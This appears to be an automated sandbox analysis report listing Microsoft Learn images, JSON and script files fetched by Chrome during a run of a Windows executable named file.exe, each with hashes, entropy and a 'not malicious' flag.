                                                                                                                                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5644
                                                                                                                                                                                                Entropy (8bit):4.785769732002188
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):33148
                                                                                                                                                                                                Entropy (8bit):4.917595394577667
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):5644
                                                                                                                                                                                                Entropy (8bit):4.785769732002188
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1173007
                                                                                                                                                                                                Entropy (8bit):5.503893944397598
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):7.949038490691881
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                File size:1'864'192 bytes
                                                                                                                                                                                                MD5:15a0533dbbd05872ade7db7af70e20f0
                                                                                                                                                                                                SHA1:9aa7aebb7472f67f2c9ddc9bef2fbe3e0ebcabdf
                                                                                                                                                                                                SHA256:77759718bf4686d4cd5d44f739f1ef98dd7389dec31dbe3f7f03f3ad09729ec9
